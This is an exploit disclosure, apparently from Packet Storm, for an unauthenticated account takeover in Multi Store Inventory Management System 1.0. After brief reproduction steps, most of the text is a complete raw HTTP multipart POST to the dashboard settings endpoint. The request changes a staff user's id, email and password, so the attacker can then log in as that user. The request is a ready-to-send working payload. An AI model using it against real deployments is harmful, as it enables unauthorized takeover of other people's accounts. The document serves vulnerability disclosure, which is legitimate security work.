Multi Store Inventory Management System version 1.0 suffers from an account takeover vulnerability due to missing authorization controls.
1a2fb03891ca04bd48c2510e8d97fe8266c1a84eb9915f07b8ce0f735d80083c# Exploit Title: Multi Store Inventory Management System - Account Takeover (Unauthenticated)
# Date: 04/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.bdtask.com/
# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/
# Version: 1.0
# Tested on: XAMPP, Windows 10
# Contact: https://twitter.com/dmaral3noz
# Description :
An attacker can takeover any registered 'Staff' user account by just sending below POST request
By changing the the "id", "email", "password" , "firstname" and "lastname" parameters
#Steps to Reproduce :
1. Send the below POST request by changing "id", "email", "password" parameters.
2. Log in to the user account by changed email and password.
################################################
POST /multistore_demo/dashboard/home/setting HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------246162487211952414471071914687
Content-Length: 1645
Origin: http://localhost
Connection: close
Referer: http://localhost/multistore_demo/dashboard/home/setting
Cookie: ci_session=31504fa8fdcd43505beff1b210056ec12d5d8405
Upgrade-Insecure-Requests: 1
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="id"
1
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="firstname"
saud
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="lastname"
test
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="email"
s3od@hi.com
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="password"
admin123
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="about"
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="old_image"
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
-----------------------------246162487211952414471071914687--
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed